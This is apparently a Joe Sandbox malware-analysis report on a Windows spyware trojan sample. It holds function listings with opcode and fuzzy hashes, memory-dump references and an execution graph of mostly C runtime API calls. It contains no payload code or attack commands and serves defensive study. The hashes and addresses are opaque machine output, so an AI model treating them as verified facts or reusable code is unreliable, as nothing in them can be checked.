                                                                                                      • Opcode Fuzzy Hash: 9cfd52f45ab5dc4fce2285d457194e45e3416c299f1ca1b90b44c240d660db00
                                                                                                      • Instruction Fuzzy Hash: 4F61BE32919BC591DB209F15E0407AABBA0FB84B89F044235EBDD83B95DF3CD294CB01
                                                                                                      Function 00007FF6C7864010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction ID: 33051a150ef08524dec1da75bdb36b5dfb06ecbb36bd41f2a5153dd2af2cf121
                                                                                                      • Opcode Fuzzy Hash: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction Fuzzy Hash: 70418A22B1BA41A9FB54DFB0D4902EC3BA4EF54B49F040034EF9DA7A99CF38D6219345
                                                                                                      Function 00007FF6C7863E90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
                                                                                                      • Instruction ID: 36a0cc02e8a56ad2c793c68617c674b7d07847978951a5d245b96ff83ead4943
                                                                                                      • Opcode Fuzzy Hash: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
                                                                                                      • Instruction Fuzzy Hash: A9416A22B1BA41A9EB14DFB0D4902AC3BB4EF44749F044434EF8DA7E99DF38D6269354
                                                                                                      Function 00007FF6C7863D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: 3000be0bc1095b4f4dd57d4acf3841f6710e640be6946436ed2f934302c65666
                                                                                                      • Instruction ID: eadd539760e2dd4adf503e1bfe8a96cc4a8b57e3de35623469196d79cc7b5d16
                                                                                                      • Opcode Fuzzy Hash: 3000be0bc1095b4f4dd57d4acf3841f6710e640be6946436ed2f934302c65666
                                                                                                      • Instruction Fuzzy Hash: 40415732B1AA41A9EB14DFB0D4902AC3BA4EF44B09F040035EF8DA7E99CF38D625D314
                                                                                                      Function 00007FF6C788436C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentFreeStrings$Heap$AllocateErrorLast
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 1848424169-1631433037
                                                                                                      • Opcode ID: b6a04fea2e6691cd475f1294f2ce5ffa6e45bea10a0c99e5ec4a87127725abdd
                                                                                                      • Instruction ID: 215c8cc1c75465ebe780b8a6b8e821cf40bdbb5fa38c8284518dbc17956be2dd
                                                                                                      • Opcode Fuzzy Hash: b6a04fea2e6691cd475f1294f2ce5ffa6e45bea10a0c99e5ec4a87127725abdd
                                                                                                      • Instruction Fuzzy Hash: 03318722A0A75281EA659F26684007E6FA5FF54FD5F48423AEBDE93BC5DF3CE4418300
                                                                                                      Function 00007FF6C787BE9C Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction ID: bafb6c3f0a175c7bcd671fa37fb7aaba81283b96cfa2d6f24a435ca097377d10
                                                                                                      • Opcode Fuzzy Hash: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction Fuzzy Hash: EFD10332B1AA8189E710CFB5D4402AC3BB5FB14B9AB454236DF9ED7B99DE38D406C300
                                                                                                      Function 00007FF6C78840AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 546120528-1631433037
                                                                                                      • Opcode ID: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction ID: 0759fc66cbaa7c17ee9c7c29a4026e63be65559624f1126da0474120c5f47be5
                                                                                                      • Opcode Fuzzy Hash: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction Fuzzy Hash: 6581CC63A0E68282EB658F26A040179BFA1EB54782F584037CBEEC7A91DF3CE545C304
                                                                                                      Function 00007FF6C786B828 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                      • Opcode ID: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction ID: 06143dfc80e0df7769395e8aacd3ba94d9bb589bbb66e4f64b2824ebbff8df55
                                                                                                      • Opcode Fuzzy Hash: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction Fuzzy Hash: 7F71A17262A68296DB618F26908077D7FA1EB44F8AF248135DFCCC7A85DF2CD651C740
                                                                                                      Function 00007FF6C786BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                      • Opcode ID: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction ID: 98f57f38f69a3d657d5b0e7a7164946e0118fec3762fc9df172e0c4d8630cdfc
                                                                                                      • Opcode Fuzzy Hash: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction Fuzzy Hash: 0B51707662A74596E620EF16E44026E7FA8F788B91F100138EBCD87B95DF3CE550CB01
                                                                                                      Function 00007FF6C7877114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, xrefs: 00007FF6C7877152
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                      • API String ID: 3580290477-1341743030
                                                                                                      • Opcode ID: 826ece68b2de395fc5557eeabaea98f135a51b0408a18a67728276ec84c6d2a4
                                                                                                      • Instruction ID: ca0118195e139b0f17651ecc27e4581ad0ad58941383a4228dd264e039db597d
                                                                                                      • Opcode Fuzzy Hash: 826ece68b2de395fc5557eeabaea98f135a51b0408a18a67728276ec84c6d2a4
                                                                                                      • Instruction Fuzzy Hash: 8C416C32B0AB5295EB58DF25A8801BD2BA6EB44B95B544035FB8FC3B85DE3DE481C310
                                                                                                      Function 00007FF6C787C534 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction ID: 85f1775e7a6d8a9694ec78d74a5b8cbd9e5c80e4a70d768f0862f750a8022d41
                                                                                                      • Opcode Fuzzy Hash: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction Fuzzy Hash: 4441A322B1AA4191DB60CF25E8443BA6BA4FB98795F854035EF8EC7798DF3CD541C740
                                                                                                      Function 00007FF6C7851BA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1838369231-1405518554
                                                                                                      • Opcode ID: 7d49fe92b0c7c85a1320eea0bc9836c521db474d021f354e7151b42a68dd87d1
                                                                                                      • Instruction ID: 3fe48c5e534612cc1d0809d9c20e9f304249cc8ef25c2f4547fbd4d5b9707acb
                                                                                                      • Opcode Fuzzy Hash: 7d49fe92b0c7c85a1320eea0bc9836c521db474d021f354e7151b42a68dd87d1
                                                                                                      • Instruction Fuzzy Hash: 64014B3251AB818AD7859F75A88015D7AA5FB68B88B185139CB9CC371AEF38C5A0C340
                                                                                                      Function 00007FF6C78695E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction ID: e4d11125dbd464d86453b4f8c834b7b9103da8e497506aa08a866c403335745d
                                                                                                      • Opcode Fuzzy Hash: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction Fuzzy Hash: F8112E32619B4182EB618F15F440269BBE4FB88B85F584235DBCC87754DF3DD551C700

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.3%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:1289
                                                                                                      Total number of Limit Nodes:43
                                                                                                      execution_graph 19350 7ff76e1a2350 19351 7ff76e1a2360 19350->19351 19358 7ff76e1ab7f8 19351->19358 19353 7ff76e1a2369 19357 7ff76e1a2377 19353->19357 19366 7ff76e1a2154 GetStartupInfoW 19353->19366 19359 7ff76e1ab817 19358->19359 19365 7ff76e1ab840 19358->19365 19377 7ff76e19d35c 19359->19377 19363 7ff76e1ab828 19363->19353 19365->19363 19383 7ff76e1ab700 19365->19383 19367 7ff76e1a2223 19366->19367 19368 7ff76e1a2189 19366->19368 19372 7ff76e1a2244 19367->19372 19368->19367 19369 7ff76e1ab7f8 31 API calls 19368->19369 19370 7ff76e1a21b2 19369->19370 19370->19367 19371 7ff76e1a21dc GetFileType 19370->19371 19371->19370 19374 7ff76e1a2262 19372->19374 19373 7ff76e1a2331 19373->19357 19374->19373 19375 7ff76e1a22bd GetStdHandle 19374->19375 19375->19374 19376 7ff76e1a22d0 GetFileType 19375->19376 19376->19374 19390 7ff76e1a1f68 19377->19390 19379 7ff76e19d365 19380 7ff76e19c3c4 19379->19380 19541 7ff76e19c25c 19380->19541 19384 7ff76e1a23d0 _set_fmode 6 API calls 19383->19384 19388 7ff76e1ab721 19384->19388 19385 7ff76e1ab783 19386 7ff76e1a2448 __free_lconv_mon 6 API calls 19385->19386 19387 7ff76e1ab78d 19386->19387 19387->19365 19388->19385 19653 7ff76e1a2a44 19388->19653 19393 7ff76e1a1f7d __vcrt_getptd_noinit 19390->19393 19391 7ff76e1a1fa9 FlsSetValue 19392 7ff76e1a1fbb 19391->19392 19396 7ff76e1a1f99 __vcrt_getptd_noinit 19391->19396 19406 7ff76e1a23d0 19392->19406 19393->19391 19393->19396 19396->19379 19397 7ff76e1a1fe8 FlsSetValue 19400 7ff76e1a1ff4 FlsSetValue 19397->19400 19401 7ff76e1a2006 19397->19401 19398 7ff76e1a1fd8 FlsSetValue 19399 7ff76e1a1fe1 19398->19399 19412 7ff76e1a2448 19399->19412 19400->19399 19417 7ff76e1a1b9c 19401->19417 19405 7ff76e1a2448 __free_lconv_mon 2 API calls 19405->19396 19411 7ff76e1a23e1 _set_fmode std::_Facet_Register 19406->19411 19407 7ff76e1a2432 19410 7ff76e19d35c _set_fmode 5 API calls 19407->19410 19408 7ff76e1a2416 RtlAllocateHeap 19409 7ff76e1a1fca 19408->19409 19408->19411 19409->19397 19409->19398 19410->19409 19411->19407 19411->19408 19413 7ff76e1a244d HeapFree 19412->19413 19416 7ff76e1a247c 19412->19416 19414 7ff76e1a2468 __free_lconv_mon __vcrt_getptd_noinit 19413->19414 19413->19416 19415 7ff76e19d35c _set_fmode 5 API calls 19414->19415 19415->19416 19416->19396 19418 7ff76e1a1c4e _set_fmode 19417->19418 19421 7ff76e1a1af4 19418->19421 19420 7ff76e1a1c63 19420->19405 19422 7ff76e1a1b10 19421->19422 19425 7ff76e1a1d88 19422->19425 19424 7ff76e1a1b26 19424->19420 19426 7ff76e1a1dd0 Concurrency::details::SchedulerProxy::DeleteThis 19425->19426 19427 7ff76e1a1da4 Concurrency::details::SchedulerProxy::DeleteThis 19425->19427 19426->19424 19427->19426 19429 7ff76e1accf4 19427->19429 19430 7ff76e1acd90 19429->19430 19431 7ff76e1acd17 19429->19431 19432 7ff76e1acde3 19430->19432 19434 7ff76e1a2448 __free_lconv_mon 6 API calls 19430->19434 19431->19430 19435 7ff76e1acd56 19431->19435 19439 7ff76e1a2448 __free_lconv_mon 6 API calls 19431->19439 19495 7ff76e1ace94 19432->19495 19436 7ff76e1acdb4 19434->19436 19438 7ff76e1acd78 19435->19438 19444 7ff76e1a2448 __free_lconv_mon 6 API calls 19435->19444 19437 7ff76e1a2448 __free_lconv_mon 6 API calls 19436->19437 19440 7ff76e1acdc8 19437->19440 19441 7ff76e1a2448 __free_lconv_mon 6 API calls 19438->19441 19442 7ff76e1acd4a 19439->19442 19443 7ff76e1a2448 __free_lconv_mon 6 API calls 19440->19443 19446 7ff76e1acd84 19441->19446 19455 7ff76e1abc4c 19442->19455 19449 7ff76e1acdd7 19443->19449 19450 7ff76e1acd6c 19444->19450 19445 7ff76e1ace4e 19451 7ff76e1a2448 __free_lconv_mon 6 API calls 19446->19451 19447 7ff76e1acdef 19447->19445 19452 7ff76e1a2448 6 API calls __free_lconv_mon 19447->19452 19453 7ff76e1a2448 __free_lconv_mon 6 API calls 19449->19453 19483 7ff76e1ac27c 19450->19483 19451->19430 19452->19447 19453->19432 19456 7ff76e1abc55 19455->19456 19481 7ff76e1abd50 19455->19481 19457 7ff76e1abc6f 19456->19457 19459 7ff76e1a2448 __free_lconv_mon 6 API calls 19456->19459 19458 7ff76e1abc81 19457->19458 19460 7ff76e1a2448 __free_lconv_mon 6 API calls 19457->19460 19461 7ff76e1abc93 19458->19461 19462 7ff76e1a2448 __free_lconv_mon 6 API calls 19458->19462 19459->19457 19460->19458 19463 7ff76e1a2448 __free_lconv_mon 6 API calls 19461->19463 19464 7ff76e1abca5 19461->19464 19462->19461 19463->19464 19465 7ff76e1abcb7 19464->19465 19466 7ff76e1a2448 __free_lconv_mon 6 API calls 19464->19466 19467 7ff76e1abcc9 19465->19467 19469 7ff76e1a2448 __free_lconv_mon 6 API calls 19465->19469 19466->19465 19468 7ff76e1abcdb 19467->19468 19470 7ff76e1a2448 __free_lconv_mon 6 API calls 19467->19470 19471 7ff76e1abced 19468->19471 19472 7ff76e1a2448 __free_lconv_mon 6 API calls 19468->19472 19469->19467 19470->19468 19473 7ff76e1abcff 19471->19473 19474 7ff76e1a2448 __free_lconv_mon 6 API calls 19471->19474 19472->19471 19475 7ff76e1abd11 19473->19475 19476 7ff76e1a2448 __free_lconv_mon 6 API calls 19473->19476 19474->19473 19477 7ff76e1abd26 19475->19477 19478 7ff76e1a2448 __free_lconv_mon 6 API calls 19475->19478 19476->19475 19479 7ff76e1abd3b 19477->19479 19480 7ff76e1a2448 __free_lconv_mon 6 API calls 19477->19480 19478->19477 19479->19481 19482 7ff76e1a2448 __free_lconv_mon 6 API calls 19479->19482 19480->19479 19481->19435 19482->19481 19484 7ff76e1ac281 19483->19484 19485 7ff76e1ac2e2 19483->19485 19486 7ff76e1ac29a 19484->19486 19487 7ff76e1a2448 __free_lconv_mon 6 API calls 19484->19487 19485->19438 19488 7ff76e1ac2ac 19486->19488 19489 7ff76e1a2448 __free_lconv_mon 6 API calls 19486->19489 19487->19486 19490 7ff76e1ac2be 19488->19490 19491 7ff76e1a2448 __free_lconv_mon 6 API calls 19488->19491 19489->19488 19492 7ff76e1ac2d0 19490->19492 19493 7ff76e1a2448 __free_lconv_mon 6 API calls 19490->19493 19491->19490 19492->19485 19494 7ff76e1a2448 __free_lconv_mon 6 API calls 19492->19494 19493->19492 19494->19485 19496 7ff76e1ace99 19495->19496 19497 7ff76e1acec5 19495->19497 19496->19497 19501 7ff76e1ac94c 19496->19501 19497->19447 19500 7ff76e1a2448 __free_lconv_mon 6 API calls 19500->19497 19502 7ff76e1ac955 19501->19502 19503 7ff76e1aca44 19501->19503 19537 7ff76e1ac5d8 19502->19537 19503->19500 19506 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19507 7ff76e1ac97e 19506->19507 19508 7ff76e1ac5d8 